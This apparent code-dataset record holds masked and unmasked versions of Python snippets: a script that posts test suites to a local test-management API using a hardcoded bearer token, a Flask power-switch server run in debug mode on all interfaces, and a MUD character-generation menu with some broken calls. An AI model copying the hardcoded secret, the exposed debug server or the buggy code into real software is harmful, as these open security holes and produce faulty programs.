test\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Redirect to login page\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registration\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registrate same user\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Log and logout\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\n", "step-5": "# Basic script which send some request via rest api to the test-management-tool.\n# Be sure you setup host and api_token variable\n\nimport http.client\n\nhost = \"localhost:8000\"\napi_token = \"fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3\"\n\n# Connection\nconn = http.client.HTTPConnection(host)\n\n# Create a header of http request\nheaders = {\n 'authorization': \"Bearer \" + api_token,\n 'content-type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'postman-token': \"44709a5c-ca4a-bbce-4b24-f0632a29bde4\"\n }\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Create and edit project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"Name\\\": \\\"Create and edit requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Not selected project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Create project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Create project without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Check if overview contains project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Edit project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n################################################\n\n###\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Create project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Create requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Create requirement without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Overview contains requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Edit requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Cover requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Create and edit TestSuites and TestCase\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test suite\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test suite without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Check if overview contains suite\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Edit test suite\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test case without details\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test case with details\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test case without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Check if overview contains case\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Edit test case\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Create test set and run\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create set\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Overview contains set\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create set without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create set without tests\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Edit test set\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create test run\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Overview contains run\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Execute contains tests\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Registration and log test\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Redirect to login page\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Registration\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Registrate same user\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Log and logout\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> @app.route('/') def hello_world(): return render_template('index.html') <|reserved_special_token_0|> @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == '__main__': powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True) <|reserved_special_token_1|> <|reserved_special_token_0|> app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == '__main__': powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True) <|reserved_special_token_1|> from flask import Flask from flask import render_template from flask import make_response import json from lib import powerswitch app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == '__main__': powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True) <|reserved_special_token_1|> from flask import Flask from flask import render_template from flask import make_response import json from lib import powerswitch app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == "__main__": powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True)
flexible
{ "blob_id": "18d3f58048b7e5d792eb2494ecc62bb158ac7407", "index": 254, "step-1": "<mask token>\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n<mask token>\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\nif __name__ == '__main__':\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-3": "<mask token>\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\nif __name__ == '__main__':\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-4": "from flask import Flask\nfrom flask import render_template\nfrom flask import make_response\nimport json\nfrom lib import powerswitch\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\nif __name__ == '__main__':\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-5": "from flask import Flask\nfrom flask import render_template\nfrom flask import make_response\n\nimport json\n\nfrom lib import powerswitch\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\nif __name__ == \"__main__\":\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-ids": [ 4, 6, 7, 8, 9 ] }
[ 4, 6, 7, 8, 9 ]
from world.enums import * from world.content.species import SPECIES from world.content.chargen import * from evennia.utils.evmenu import get_input from evennia.utils.utils import list_to_string import re def start(caller): if not caller: return caller.ndb._menutree.points = { "attributes": 20, "skills": 20 } caller.ndb._menutree.character = { "home_planet": None, "full_name": None, "origin": None, "stats": {}, "age": 16, "is_psionic": False, "current_term": 0, "species": "human" } caller.ndb._menutree.terms = [] for attribute in AttributeEnum: caller.ndb._menutree.character["stats"][attribute.name] = 20 text = """ Welcome to Singularity's Character Generator! Have a paragraph about WTF is going on and some info about our game. Also here are some warnings that you *definitely* shouldn't make multiple characters. And also here's some commands to help get you more info! TBD!!! |yPlease do not make multiple characters to game chargen.|n When you're ready, go ahead and like.. type |ybegin|n to start CharGen. """ return text, ({"key": "begin", "goto": "node_menu"}) def node_menu(caller): name = caller.ndb._menutree.character["full_name"] if not name: name = "Not Set" species = caller.ndb._menutree.character["species"] origin = caller.ndb._menutree.character["origin"] if not origin: origin = "Not Set" d_b = "|gOk|n" if _is_basics_done(caller)[0] else "|rNo|n" d_a = "|gOk|n" if _is_attributes_done(caller)[0] else "|rNo|n" d_s = "|gOk|n" if _is_skills_done(caller)[0] else "|rNo|n" d_l = "|gOk|n" if _is_life_done(caller)[0] else "|rNo|n" text = """ Below are the general details of your character. Use the below commands to navigate through chargen steps. Some steps may appear after others are completed. |wFull Name:|n %s |wSpecies:|n %s |wOrigin:|n %s Completed: |wBasics:|n %s |wAttributes:|n %s |wStarting Skills:|n %s |wLife path:|n %s """ % (name, species, origin, d_b, d_a, d_s, d_l) options = ( {"key": "basics", "goto": "node_basics"}, {"key": "attributes", "goto": "node_attributes"}, {"key": "skills", "goto": "node_skills"} ) if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0] and _is_skills_done(caller)[0]: options.append({"key": "life path", "goto": "node_terms"}) if _is_life_done(caller)[0]: options.append({"key": "finish", "goto": "node_finish"}) return text, options def node_basics(caller): character = caller.ndb._menutree.character name = character["full_name"] if not name: name = "Not Set" species = character["species"] origin = character["origin"] if not origin: origin = "Not Set" age = character["age"] text = """ |wFull Name:|n %s |wAdolescent Age:|n %s |wSpecies:|n %s |wOrigin:|n %s Type |yhelp <command>|n to get info on available choices. """ % (name, age, species, origin) options = ( {"key": "return", "goto": "node_menu"}, {"key": "full_name", "goto": _node_basics_full_name}, {"key": "age", "goto": _node_basics_age}, {"key": "species", "goto": _node_basics_species}, {"key": "origin", "goto": _node_basics_origin} ) return text, options def _node_basics_full_name(caller): def callback(caller, prompt, user_input): caller.msg("You set your character's full name to: %s." % user_input) caller.ndb._menutree.character["full_name"] = user_input get_input(caller, ">> Enter your character's full name.", callback) def _node_basics_age(caller): def callback(caller, prompt, user_input): species = next(s for s in CHARGEN["species"] if s["key"] == caller.ndb._menutree.character["species"]) if not user_input.is_integer() \ or int(user_input) < species["min_start_age"] \ or int(user_input) > species["max_start_age"]: caller.msg("Age must be a valid number between %s and %s." % (species["min_start_age"], species["max_start_age"])) return caller.msg("You set your character's age to: %s." % user_input) caller.ndb._menutree.character["age"] = int(user_input) get_input(caller, ">> Enter your character's age.", callback) def _node_basics_species(caller): def callback(caller, prompt, user_input): character = caller.ndb._menutree.character species = next((s for s in SPECIES if s["title"].lower().startswith(user_input.lower())), None) if not species: caller.msg("'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n" % user_input) return species_chargen = next(s for s in CHARGEN["species"] if s["key"] == species["key"]) caller.msg("You set your character's species to: %s." % species["title"]) character["age"] = species_chargen["min_age"] character["origin"] = None character["species"] = species["key"] get_input(caller, ">> Enter your character's species.", callback) def _node_basics_origin(caller): def callback(caller, prompt, user_input): character = caller.ndb._menutree.character origins = filter(lambda o: character["species"] in o["species_restrictions"], CHARGEN["origins"]) origin = next((o for o in origins if o["title"].lower().startswith(user_input.lower())), None) if not origin: caller.msg("'%s' is not a valid origin choice. Valid choices: %s" % (user_input, list_to_string(map(lambda o: o["title"], origins)))) return caller.msg("You set your character's origin to: %s." % user_input) character["origin"] = origin["key"] get_input(caller, ">> Enter your character's origin.", callback) def _is_attributes_done(caller): if caller.ndb._menutree.points["attributes"] != 0: return False, "All attribute points must be allocated." return True, "" def _is_basics_done(caller): character = caller.ndb._menutree.character name = character["full_name"] if not name or len(name) < 3: return False, "Full name must have a value and be longer than 3 characters." origin = character["origin"] if not origin: return False, "Must select an origin." species_stats = next(s for s in CHARGEN["species"] if s["key"] == character["species"]) age = character["age"] if age < species_stats["min_start_age"]: return False, "Age must be equal to or more than %s." % species_stats["min_start_age"] if age > species_stats["max_start_age"]: return False, "Age must be equal to or less than %s." % species_stats["max_start_age"] return True, "" def _is_skills_done(caller): return False, "" def _is_life_done(caller): return False, "" def node_skills(caller): text = """ """ index = 0 stats = caller.ndb._menutree.character["stats"] for skill in SkillEnum: if index % 2 == 0: text += "\n" text += ("%s:" % skill.name).ljust(28) value = stats.get(skill.name, 0) text += str(value).rjust(9) if index % 2 == 0: text += " " index += 1 options = ( {"key": "return", "goto": "node_menu"}, {"key": "set", "goto": ""} ) return text, options def node_attributes(caller): text = "" for attribute in AttributeEnum: if attribute == AttributeEnum.Psi and not caller.ndb._menutree.character["is_psionic"]: continue text += "%s: " % attribute.name text += "%s\r\n" % caller.ndb._menutree.character["stats"][attribute.name] text += "\r\n%s points remaining.\r\n" % caller.ndb._menutree.points["attributes"] text += "\r\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively." text += "\r\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively." # options = {"key": "_default", "goto": _node_attributes} # if caller.ndb._menutree.points["attributes"] == 0: options = ({"key": "_default", "goto": _node_attributes}, {"key": "return", "goto": "node_menu"}) return text, options def _node_attributes(caller, raw_string): match = re.match(r"add (\d+) to (\w+)", raw_string) if match: return adjust_attribute(caller, match, True) match = re.match(r"sub (\d+) from (\w+)", raw_string) if match: return adjust_attribute(caller, match, False) if not match: return "node_attributes" def node_terms(caller): text = "" term_count = 1 for term in caller.ndb._menutree.terms: text += "\r\n* Term %s:" % term_count + " %s" % term.title term_count += 1 age = caller.ndb._menutree.character["age"] + (4 * caller.ndb._menutree.character["current_term"]) text += "\r\nCurrent Character Age: %s" % age text += "\r\n\r\nType \"|ychoose <term>|n\" to begin a term." options = ({"key": "_default", "goto": _node_terms}, {"key": "list choices", "goto": _list_term_choices}, {"key": "finish", "goto": "node_finish"}) return text, options def _node_terms(caller, raw_string): match = re.match(r"choose (\w+)", raw_string) if not match: error(caller, "I didn't understand that.") return "node_terms" term_token = match.group(1).lower() term = next((x for x in TERMS if x["title"].lower().startswith(term_token)), None) if not term: error(caller, "%s is not a valid term. Type \"|ylist choices|n\" to get a list of all available careers.") return "node_terms" caller.ndb._menutree.terms.append({ "term": term["title"] }) return "node_term" def _list_term_choices(caller): text = "" for term in TERMS: text += "\r\n* %s" % term["title"] for assignment in term["assignments"]: text += "\r\n\t- %s: " % assignment["title"] text += "sample description text" caller.msg(text) return "node_terms" def node_term(caller): term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1]["term"] # term = next((x for x in TERMS if x["title"] == term_title), None) text = "Career: %s" % term_title text += "\r\nAssignment: Not Set" text += "\r\nPersonal Advancement: Not Set" text += "\r\nYears: %s" % caller.ndb._menutree.character["age"] text += "-%s" % (caller.ndb._menutree.character["age"] + 4) text += "\r\n\r\nLife Event: |y1 Available|n" text += "\r\n\r\nType \"|yset Assignment to <assignment>|n\" to choose an assignment." text += "\r\nType \"|yset Advancement to <option>|n\" to choose a personal advancement." text += "\r\n\r\nRolling for a life event is optional and may yield positive or negative results. " text += "Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan." options = ({"key": "show assignments", "goto": _list_term_assignments}, {"key": "show advancements", "goto": _list_term_advancements}, {"key": "roll life event", "goto": _do_life_event}) return text, options def _list_term_advancements(caller): return "node_term" def _list_term_assignments(caller): return "node_term" def _do_life_event(caller): return "node_term" def adjust_attribute(caller, match, is_add): attribute_token = match.group(2).lower() attribute = next((x for x in AttributeEnum if x.name.lower().startswith(attribute_token)), None) if not attribute: error(caller, "%s is not a valid attribute." % match.group(2)) return "node_attributes" value = int(match.group(1)) if not value or value < 0: error(caller, "Value to adjust must be a positive number.") return "node_attributes" attribute_value = caller.ndb._menutree.character["stats"][attribute.name] if not is_add and attribute_value - value < 10: error(caller, attribute.name + " cannot be reduced below 10.") return "node_attributes" # calculate cost.. i_value = value cost = 0 while i_value > 0: if is_add: new_value = i_value + attribute_value else: new_value = attribute_value - i_value if new_value <= 12: cost += 4 elif new_value <= 16: cost += 2 elif new_value <= 23: cost += 1 elif new_value <= 26: cost += 2 elif new_value <= 30: cost += 4 i_value -= 1 if not is_add: cost *= -1 if cost > caller.ndb._menutree.points["attributes"]: deficit = (caller.ndb._menutree.points["attributes"] - cost) * -1 error(caller, "Raising %s" % attribute.name + " costs %s total points," % cost + " %s more points than you have available." % deficit) return "node_attributes" # Succeeded the gauntlet. Change their stat. if is_add: caller.ndb._menutree.character["stats"][attribute.name] += value else: caller.ndb._menutree.character["stats"][attribute.name] -= value caller.ndb._menutree.points["attributes"] -= cost msg = "Successfully set %s " % attribute.name + "to %s" % caller.ndb._menutree.character["stats"][attribute.name] msg += " for %s points." % cost success(caller, msg) return "node_attributes" def node_finish(caller): text = "" options = () return text, options def success(caller, msg): caller.msg("|b<|cSystem|b>|n %s" % msg) def error(caller, msg): caller.msg("|y<|rError|y>|n %s" % msg)
normal
{ "blob_id": "99eeb039e1a369e450247d10ba22a1aa0b35dae9", "index": 6875, "step-1": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\n<mask token>\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\n<mask token>\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' % species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\n<mask token>\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 